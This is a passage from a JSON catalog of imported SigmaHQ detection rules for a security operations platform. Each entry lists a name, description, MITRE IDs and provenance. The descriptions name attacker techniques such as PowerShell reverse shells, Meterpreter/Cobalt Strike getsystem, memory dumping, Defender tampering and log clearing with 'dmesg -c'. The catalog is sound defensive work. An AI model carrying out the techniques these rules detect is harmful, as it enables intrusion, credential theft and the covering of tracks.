"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" } }, { "id": "sigmahq-sigma-ebea773c-a8f1-42ad-a856-00cb221966e8", "type": "detection", "name": "DLL Sideloading by VMware Xfer Utility", "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-sideloading-by-vmware-xfer-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebea773c-a8f1-42ad-a856-00cb221966e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" } }, { "id": 
"sigmahq-sigma-ebef4391-1a81-4761-a40a-1db446c0e625", "type": "detection", "name": "New ActiveScriptEventConsumer Created Via Wmic.EXE", "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-activescripteventconsumer-created-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebef4391-1a81-4761-a40a-1db446c0e625", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml" } }, { "id": "sigmahq-sigma-ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d", "type": "detection", "name": "MSSQL Server Failed Logon From External Network", "description": "Detects failed logon attempts from clients with external network IP to an MSSQL server. 
This can be a sign of a bruteforce attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-server-failed-logon-from-external-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml" } }, { "id": "sigmahq-sigma-ec0722a3-eb5c-4a56-8ab2-bf6f20708592", "type": "detection", "name": "Renamed Gpg.EXE Execution", "description": "Detects the execution of a renamed \"gpg.exe\". 
Often used by ransomware and loaders to decrypt/encrypt data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-gpg-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec0722a3-eb5c-4a56-8ab2-bf6f20708592", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_gpg4win.yml" } }, { "id": "sigmahq-sigma-ec127035-a636-4b9a-8555-0efd4e59f316", "type": "detection", "name": "Clipboard Collection with Xclip Tool", "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. 
Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clipboard-collection-with-xclip-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec127035-a636-4b9a-8555-0efd4e59f316", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" } }, { "id": "sigmahq-sigma-ec19ebab-72dc-40e1-9728-4c0b805d722c", "type": "detection", "name": "Tamper Windows Defender - PSClassic", "description": "Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tamper-windows-defender-psclassic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml" } }, { "id": "sigmahq-sigma-ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "type": "detection", "name": "WMI Persistence - Script Event Consumer", "description": "Detects WMI script event consumers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence-script-event-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" } }, { "id": "sigmahq-sigma-ec290c06-9b6b-4338-8b6b-095c0f284f10", "type": "detection", "name": "Suspicious Execution of Shutdown to Log Out", "description": "Detects the rare use of the command line tool shutdown to logoff a user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-shutdown-to-log-out.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml" } }, { "id": "sigmahq-sigma-ec52985a-d024-41e3-8ff6-14169039a0b3", "type": "detection", "name": "Mount Execution With Hidepid Parameter", "description": "Detects execution of the \"mount\" command with the \"hidepid\" parameter to make processes invisible to other users on the system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mount-execution-with-hidepid-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec52985a-d024-41e3-8ff6-14169039a0b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml" } }, { "id": "sigmahq-sigma-ec541962-c05a-4420-b9ea-84de072d18f4", "type": "detection", "name": "New AWS Lambda Function URL Configuration Created", "description": "Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls.\nThis could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-aws-lambda-function-url-configuration-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec541962-c05a-4420-b9ea-84de072d18f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_lambda_function_url.yml" } }, { "id": "sigmahq-sigma-ec570e53-4c76-45a9-804d-dc3f355ff7a7", "type": "detection", "name": "7Zip Compressing Dump Files", "description": "Detects execution of 7z in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/7zip-compressing-dump-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml" } }, { "id": "sigmahq-sigma-ec82e2a5-81ea-4211-a1f8-37a0286df2c2", "type": "detection", "name": "Suspicious DNS Query for IP Lookup Service APIs", "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-query-for-ip-lookup-service-apis.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml" } }, { "id": "sigmahq-sigma-ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", "type": "detection", "name": "Persistence Via TypedPaths - CommandLine", "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. 
Which might indicate persistence attempt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-typedpaths-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml" } }, { "id": "sigmahq-sigma-ec8c4047-fad9-416a-8c81-0f479353d7f6", "type": "detection", "name": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/diagnostic-library-sdiageng-dll-loaded-by-msdt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_sdiageng_load_by_msdt.yml" } }, { "id": 
"sigmahq-sigma-eca49c87-8a75-4f13-9c73-a5a29e845f03", "type": "detection", "name": "Suspicious Runscripthelper.exe", "description": "Detects execution of powershell scripts via Runscripthelper.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-runscripthelper-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml" } }, { "id": "sigmahq-sigma-eca5e022-d368-4043-98e5-9736fb01f72f", "type": "detection", "name": "Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall", "description": "Detects the use of the `syslog` syscall with action code 5 (SYSLOG_ACTION_CLEAR),\n(4 is SYSLOG_ACTION_READ_CLEAR and 6 is SYSLOG_ACTION_CONSOLE_OFF) which clears the kernel\nring buffer (dmesg logs). This can be used by attackers to hide traces after exploitation\nor privilege escalation. 
A common technique is running `dmesg -c`, which triggers this syscall internally.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clear-or-disable-kernel-ring-buffer-logs-via-syslog-syscall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca5e022-d368-4043-98e5-9736fb01f72f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_clean_disable_dmesg_logs_via_syslog.yml" } }, { "id": "sigmahq-sigma-eca81e8d-09e1-4d04-8614-c91f44fd0519", "type": "detection", "name": "New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE", "description": "Detects the addition of a new \"Allow\" firewall rule by the WMI process (WmiPrvSE.EXE).\nThis can occur if an attacker leverages PowerShell cmdlets such as \"New-NetFirewallRule\", or directly uses WMI CIM classes such as \"MSFT_NetFirewallRule\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-firewall-rule-added-in-windows-firewall-exception-list-via-wmiprvse-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca81e8d-09e1-4d04-8614-c91f44fd0519", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule_wmiprvse.yml" } }, { "id": "sigmahq-sigma-eca8ae39-5c3c-4321-b538-9e64fe25822e", "type": "detection", "name": "Installation of WSL Kali-Linux", "description": "Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).\nAttackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/installation-of-wsl-kali-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca8ae39-5c3c-4321-b538-9e64fe25822e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wsl_kali_linux_installation.yml" } }, { "id": "sigmahq-sigma-eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "type": "detection", "name": "Uncommon Outbound Kerberos Connection - Security", "description": "Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/uncommon-outbound-kerberos-connection-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" } }, { "id": "sigmahq-sigma-ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "type": "detection", "name": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/meterpreter-or-cobalt-strike-getsystem-service-installation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" } }, { "id": "sigmahq-sigma-ed447910-bc30-4575-a598-3a2e49516a7a", "type": "detection", "name": "Linux Setuid Capability Set on a Binary via Setcap Utility", "description": "Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary 
file.\nThis capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user).\nThis behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-setuid-capability-set-on-a-binary-via-setcap-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ed447910-bc30-4575-a598-3a2e49516a7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_cap_setuid.yml" } }, { "id": "sigmahq-sigma-ed5d72a6-f8f4-479d-ba79-02f6a80d7471", "type": "detection", "name": "Potential LethalHTA Technique Execution", "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spawned by an \"svchost.exe\" process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-lethalhta-technique-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"ed5d72a6-f8f4-479d-ba79-02f6a80d7471", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml" } }, { "id": "sigmahq-sigma-ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", "type": "detection", "name": "Outbound RDP Connections Over Non-Standard Tools", "description": "Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.\nAn initial baseline is required before using this utility to exclude third party RDP tooling that you might use.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-rdp-connections-over-non-standard-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml" } }, { "id": "sigmahq-sigma-ed825c86-c009-4014-b413-b76003e33d35", "type": "detection", "name": "Windows Binary Executed From WSL", "description": "Detects the execution of Windows binaries from within a WSL instance.\nThis could be used to masquerade parent-child relationships", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": 
false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-binary-executed-from-wsl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ed825c86-c009-4014-b413-b76003e33d35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml" } }, { "id": "sigmahq-sigma-ed965133-513f-41d9-a441-e38076a0798f", "type": "detection", "name": "Suspicious PowerShell Invocations - Generic", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocations-generic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ed965133-513f-41d9-a441-e38076a0798f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" } }, { "id": "sigmahq-sigma-edadb1e5-5919-4e4c-8462-a9e643b02c4b", "type": "detection", "name": "Process Memory Dump via RdrLeakDiag.EXE", "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-memory-dump-via-rdrleakdiag-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml" } }, { "id": "sigmahq-sigma-edc2f8ae-2412-4dfd-b9d5-0c57727e70be", "type": "detection", "name": "Potential Powershell ReverseShell Connection", "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. 
As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/potential-powershell-reverseshell-connection.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" } }, { "id": "sigmahq-sigma-edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5", "type": "detection", "name": "Potential EACore.DLL Sideloading", "description": "Detects potential DLL sideloading of \"EACore.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-eacore-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_eacore.yml" } }, { "id": "sigmahq-sigma-edd595d7-7895-4fa7-acb3-85a18a8772ca", "type": "detection", "name": "Steganography Unzip Hidden Information From Picture File", "description": "Detects extracting of zip file 
